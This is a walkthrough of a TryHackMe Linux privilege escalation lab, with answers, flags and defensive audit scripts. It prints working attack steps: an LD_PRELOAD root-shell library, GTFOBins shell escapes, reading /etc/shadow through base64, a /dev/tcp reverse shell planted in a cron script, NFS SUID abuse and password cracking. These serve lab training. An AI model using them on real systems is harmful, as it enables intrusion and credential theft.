TryHackMe — Jr Penetration Tester — Privilege Escalation — Linux PrivEsc

Deepak Kushwah
9 min read · Nov 2, 2021

Room 1 — Linux PrivEsc

Task 1 Introduction

Read-only task.

Task 2 What is Privilege Escalation?

Read-only task.

Task 3 Enumeration

Answer the questions below

Q 1. What is the hostname of the target system?

Ans. wade7363

Q 2. What is the Linux kernel version of the target system?

Ans. 3.13.0-24-generic

Q 3. What Linux is this?

Ans. Ubuntu 14.04 LTS

Q 4. What version of the Python language is installed on the system?

Ans. 2.7.6

Q 5. What vulnerability seems to affect the kernel of the target system? (Enter a CVE number)

Ans. CVE-2015-1328

Task 4 Automated Enumeration Tools

Read-only task.

Task 5 Privilege Escalation: Kernel Exploits

Note: Launch the target machine attached to this task to follow along.

You can launch the target machine and access it directly from your browser.

Alternatively, you can access it over SSH with the low-privilege user credentials below:

Username: karen

Password: Password1

Search Google for a public exploit that matches the target's kernel version.

Download the exploit to the attacker machine, start a Python 3 HTTP server there (python3 -m http.server), and transfer it to the target machine with wget.

Hint: pick a folder on the target to which all users have read, write and execute access.

After transferring the exploit to the target machine, compile it: gcc <transferred file name> -o <exploit name>

Run id first; it still shows karen.

Run the exploit: ./<exploit name>

Run id again; we now have root rights.

Q 1. What is the content of the flag1.txt file?

Ans. THM-28392872729920

Task 6 Privilege Escalation: Sudo

Answer the questions below

Solution 1: using https://gtfobins.github.io/

https://gtfobins.github.io/ is a valuable source that documents how any program on which you may have sudo rights can be used.

As we know, user karen can run three programs on the target system with sudo rights.

Let's check with nano.

Search for nano at https://gtfobins.github.io/; it has an entry named sudo. Let's try it.

Now run “sudo nano” on the target machine.

Press Ctrl+R,

then Ctrl+X to move into execute-a-command mode.

We are now in execute-a-command mode.

Now run the command “reset; sh 1>&0 2>&0” as given on GTFOBins.

We now have a shell; let's check the user id.

Let's capture the flag.

Capturing flag2 and reading the hash of frank's password.

Solution 2: following the task info

The steps of this privilege escalation vector can be summarized as follows:

  1. Check for LD_PRELOAD (with the env_keep option)
  2. Write a simple C program compiled as a shared object (.so extension) file
  3. Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

The C code will simply spawn a root shell and can be written as follows:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid / setgid */

/* Runs when the shared object is loaded through LD_PRELOAD (built with -nostartfiles). */
void _init() {
    unsetenv("LD_PRELOAD");   /* so the spawned shell does not preload this object again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

We can save this code as shell.c and compile it with gcc into a shared object file using the following parameters:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Creating the shared object, transferring it, and getting the flag.

We need to run the program with the LD_PRELOAD option set, as follows:

sudo LD_PRELOAD=/home/user/ldpreload/shell.so find

This will result in a shell spawn with root privileges.
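An added check from the defender's side (my example, not part of the room): a small shell script that inspects saved sudo -l output for the env_keep entry that makes this vector possible and prints the sudoers fix. The two sample outputs are constructed; the karen/find rule in them is only illustrative.

```shell
#!/bin/sh
# Added example, not part of the room: look at saved `sudo -l` output for the
# env_keep entry that lets LD_PRELOAD survive sudo's environment reset.
# Input (constructed here): the text that `sudo -l` prints for a user.

# Return 0 when LD_PRELOAD is kept, 1 otherwise. $1 is a file with `sudo -l` output.
# env_reset is the sudo default; only an explicit env_keep entry keeps LD_PRELOAD.
ldpreload_kept() {
    grep -Eq 'env_keep[[:space:]]*\+?=.*LD_PRELOAD' "$1"
}

# Print a verdict and the sudoers change for the given `sudo -l` output file.
ldpreload_verdict() {
    if ldpreload_kept "$1"; then
        echo "WEAK: LD_PRELOAD is preserved; drop 'Defaults env_keep += LD_PRELOAD' from sudoers"
    else
        echo "OK: env_reset discards LD_PRELOAD before the command runs"
    fi
}

# Constructed sample outputs for the two cases (the /usr/bin/find rule is the
# kind of sudo entry the task combines with LD_PRELOAD).
weak=$(mktemp); safe=$(mktemp)
cat >"$weak" <<'EOF'
Matching Defaults entries for karen on this host:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD
User karen may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/find
EOF
cat >"$safe" <<'EOF'
Matching Defaults entries for karen on this host:
    env_reset, mail_badpass
User karen may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/find
EOF
ldpreload_verdict "$weak"
ldpreload_verdict "$safe"
```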

Q 1. How many programs can the user “karen” run on the target system with sudo rights?

Q 2. What is the content of the flag2.txt file?

Ans. THM-402028394

Q 3. How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

Ans. sudo nmap --interactive

Q 4. What is the hash of frank’s password?

Ans. $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1

Task 7 Privilege Escalation: SUID

Answer the questions below

Q 1. Which user shares the name of a great comic book writer?

Ans. gerryconway

Just use cat /etc/passwd and try the user names one by one (hit and trial).

Q 2. What is the password of user2?

Ans. Password1

Solution: now we need to do a privilege escalation.

We know that we can check SUID functions on GTFOBins.

Much of Linux's privilege control relies on governing how users and files interact. This is done with permissions. By now, you know that files can have read, write, and execute permissions. These are given to users within their privilege levels. This changes with SUID (Set-user Identification) and SGID (Set-group Identification). These allow files to be executed with the permission level of the file owner or the group owner, respectively.

You will notice these files have an “s” bit set showing their special permission level.

find / -type f -perm -04000 -ls 2>/dev/null will list files that have SUID or SGID bits set.

Let's run this: find / -type f -perm -04000 -ls 2>/dev/null

The output includes /usr/bin/base64, which we can use for our privilege escalation:

  • LFILE=/etc/shadow
  • base64 "$LFILE" | base64 --decode

Getting the password hash.

We got user2's password hash; cracking it with john gives the password.

Cracking the hash.
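As an added example (mine, not from the room), the find command above can be turned into a baseline check that reports SUID files which were not present when the baseline was taken, which is how a freshly planted SUID binary like the one the NFS task later creates would be spotted. The directory tree and SUID files below are constructed fixtures.

```shell
#!/bin/sh
# Added example, not part of the room: a baseline check built on the same
# find expression as the task (-perm -4000 is -perm -04000). Any SUID file
# that is not in the recorded baseline is reported.

# Record the sorted list of SUID regular files under tree $1 into file $2.
suid_baseline() {
    find "$1" -type f -perm -4000 2>/dev/null | sort >"$2"
}

# Print SUID files under tree $1 that are absent from baseline file $2.
suid_new() {
    find "$1" -type f -perm -4000 2>/dev/null | sort | comm -13 "$2" -
}

# Constructed fixture: a fake root tree with one expected SUID file, a
# baseline recorded from it, then a second SUID file planted afterwards.
tree=$(mktemp -d)
mkdir -p "$tree/usr/bin"
printf '#!/bin/sh\n' >"$tree/usr/bin/passwd"; chmod 4755 "$tree/usr/bin/passwd"
suid_baseline "$tree" "$tree/baseline.txt"
printf '#!/bin/sh\n' >"$tree/usr/bin/nfs";    chmod 4755 "$tree/usr/bin/nfs"
suid_new "$tree" "$tree/baseline.txt"
```

On a real host the baseline would be recorded for / right after installation and the check scheduled regularly.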

Q 3. What is the content of the flag3.txt file?

Ans. THM-3847834

Task 8 Privilege Escalation: Capabilities

Q 1. How many binaries have set capabilities?

Ans. 6

Q 2. What other binary can be used through its capabilities?

Ans. view

Q 3. What is the content of the flag4.txt file?

Ans. THM-9349843

Search GTFOBins for the capabilities entry of view.

Now run the command below:

/home/ubuntu/view -c ':pye import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

After this we get a new shell.

Task 9 Privilege Escalation: Cron Jobs

Cron jobs.

Now modify the backup.sh cron job script to start a reverse shell:

bash -i >& /dev/tcp/10.10.137.81/4242 0>&1

Hint: don't forget to give backup.sh execute rights (chmod +x).

Now run a listener on the attacker machine and wait around one to two minutes.
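An added example (mine, not from the room) for the defender's side of this task: a scan that reads a crontab in /etc/crontab layout and reports root jobs whose script is writable by others, or missing altogether. The crontab and the scripts are constructed fixtures.

```shell
#!/bin/sh
# Added example, not part of the room: report cron jobs whose script can be
# modified by someone other than its owner. A root job running such a script
# is the weakness this task relies on. Assumes the /etc/crontab layout
# (m h dom mon dow user command); @reboot-style lines are not handled.

# Print "user:script" for jobs whose script is group- or world-writable,
# and "user:script:MISSING" when the script does not exist.
weak_cron_scripts() {
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$1" |
    while read -r m h dom mon dow user cmd; do
        script=${cmd%% *}                           # first word of the command
        case $script in /*) ;; *) continue ;; esac  # only absolute paths
        if [ ! -e "$script" ]; then
            echo "$user:$script:MISSING"; continue
        fi
        perms=$(ls -ld "$script" | cut -c1-10)      # e.g. -rwxrwxrwx
        case $perms in
            ?????w*|????????w*) echo "$user:$script" ;;   # group or other write bit
        esac
    done
}

# Constructed fixture: a world-writable backup script, a locked-down one,
# and a job whose script is absent.
dir=$(mktemp -d)
printf '#!/bin/sh\necho backup\n' >"$dir/backup.sh"; chmod 777 "$dir/backup.sh"
printf '#!/bin/sh\necho rotate\n' >"$dir/rotate.sh"; chmod 755 "$dir/rotate.sh"
cat >"$dir/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/bin:/bin
# m h dom mon dow user command
* * * * * root $dir/backup.sh
0 * * * * root $dir/rotate.sh
* * * * * root $dir/cleanup.sh
EOF
weak_cron_scripts "$dir/crontab"
echo "fix: chown root and chmod 755 every script a root cron job runs"
```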

Q 1 .How many cron jobs can you see on the target system?

Ans. 4

Q 2. What is the content of the flag5.txt file?

Ans. THM-383000283

Q 3. What is Matt’s password?

Ans. 123456

cat /etc/shadow gives us the password hash.

Now we can crack it using John:

sudo john p1.txt --wordlist=/usr/share/wordlists/rockyou.txt

sudo john --show p1.txt

Task 10 Privilege Escalation: PATH

Be sure you can answer the questions below before trying this.

  1. What folders are located under $PATH?
  2. Does your current user have write privileges for any of these folders?
  3. Can you modify $PATH?
  4. Is there a script/application you can start that will be affected by this vulnerability?

find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u

$ nano thm

$ echo "/bin/bash" > thm
$ chmod 777 thm
$ ls -l thm

$ ./thm
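An added example (mine, not part of the room) that works through checklist items 1 and 2 for any PATH value, flagging the entries the current user can write to or that do not yet exist; the scratch folder is a constructed fixture.

```shell
#!/bin/sh
# Added example, not part of the room: list every folder in a PATH value and
# flag the ones the current user can write to, or that do not exist. A
# writable folder early in PATH lets a planted file shadow a command that a
# script calls by bare name, which is what the thm file above demonstrates.

# Print one "writable|missing|ok <dir>" line per PATH entry; $1 is the PATH string.
audit_path() {
    ( IFS=:                            # split on ":" inside a subshell only
      for dir in $1; do
          [ -z "$dir" ] && dir=.       # an empty entry means the current directory
          if [ ! -d "$dir" ]; then
              echo "missing $dir"      # creatable if its parent is writable
          elif [ -w "$dir" ]; then
              echo "writable $dir"
          else
              echo "ok $dir"
          fi
      done )
}

# Number of entries the current user could plant a file into.
unsafe_path_entries() {
    audit_path "$1" | grep -c -E '^(writable|missing) '
}

# Constructed fixture: a scratch folder ahead of the system folders, plus an
# entry that does not exist.
scratch=$(mktemp -d)
audit_path "$scratch:/usr/local/bin:/usr/bin:/bin:/opt/tools/bin"
```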

Answer the questions below

Q 1. What is the odd folder you have write access for?

Ans. /home/murdoch

Q 2. Exploit the $PATH vulnerability to read the content of the flag6.txt file.

Ans. No answer needed (read-only step).

Q 3. What is the content of the flag6.txt file?

Ans. THM-736628929

Task 11 Privilege Escalation: NFS

Answer the questions below

Q 1. How many mountable shares can you identify on the target system?

Ans. 3

Q 2. How many shares have the “no_root_squash” option enabled?

Ans. 3

Q 3. What is the content of the flag7.txt file?

Ans. THM-89384012

Solution: — The critical element for this privilege escalation vector is the “no_root_squash” option you can see above. By default, NFS will change the root user to nfsnobody and strip any file from operating with root privileges. If the “no_root_squash” option is present on a writable share, we can create an executable with SUID bit set and run it on the target system.

We will start by enumerating mountable shares from our attacking machine.

We will mount one of the “no_root_squash” shares to our attacking machine and start building our executable.

sudo mount -o rw 10.10.208.235:/home/ubuntu/sharedfolder /tmp/Share_at_target_machine/

Once we compile the code, we will set the SUID bit.

sudo gcc nfs.c -o nfs -w

Below we can see that both files (nfs.c and nfs) are present on the target system; because we worked on the mounted share, there was no need to transfer them.

Notice the nfs executable has the SUID bit set on the target system and runs with root privileges.
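Added example, not part of the room: a parser for /etc/exports that reports the shares exported with no_root_squash, the option this task depends on. The exports file below is constructed; only /home/ubuntu/sharedfolder is taken from the task.

```shell
#!/bin/sh
# Added example, not part of the room: list the shares in an /etc/exports
# file that carry no_root_squash. With the default root_squash, files a
# remote root writes are owned by nfsnobody, so the SUID trick above fails.

# Print "share client" for every export entry carrying no_root_squash.
# $1 is a file in /etc/exports syntax: share client(opt,...) [client(opt,...)]
no_root_squash_shares() (
    set -f                                   # keep "*" clients from globbing
    grep -Ev '^[[:space:]]*(#|$)' "$1" |
    while read -r share clients; do
        for entry in $clients; do            # each client(options) group
            case $entry in *\(*\)) ;; *) continue ;; esac   # no options: root_squash
            opts=${entry#*\(}; opts=${opts%\)}              # text inside the parentheses
            case ",$opts," in
                *,no_root_squash,*) echo "$share ${entry%%\(*}" ;;
            esac
        done
    done
)

# Constructed exports file: three shares with the weak option (the task's
# /home/ubuntu/sharedfolder among them) and one hardened share.
exports=$(mktemp)
cat >"$exports" <<'EOF'
# /etc/exports: NFS file systems being exported
/home/ubuntu/sharedfolder *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/data                 *(rw,sync,no_root_squash,no_subtree_check)
/srv/scratch              10.10.0.0/16(rw,sync,no_root_squash)
/srv/public               *(ro,sync,root_squash,no_subtree_check)
EOF
no_root_squash_shares "$exports"
echo "fix: use root_squash (or all_squash) on every writable export, then run 'exportfs -ra'"
```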

Task 12 Capstone Challenge

Now you have a fairly good understanding of the main privilege escalation vectors on Linux, and this challenge should be fairly easy.

Use whatever we have learned so far in this room.

Answer the questions below

Q 1. What is the content of the flag1.txt file?
Ans. THM-42**871**20544

Q 2. What is the content of the flag2.txt file?

Ans. THM-16**247823**238

If anyone needs any explanation or help, please message!!

Thank you!! Happy hacking!!
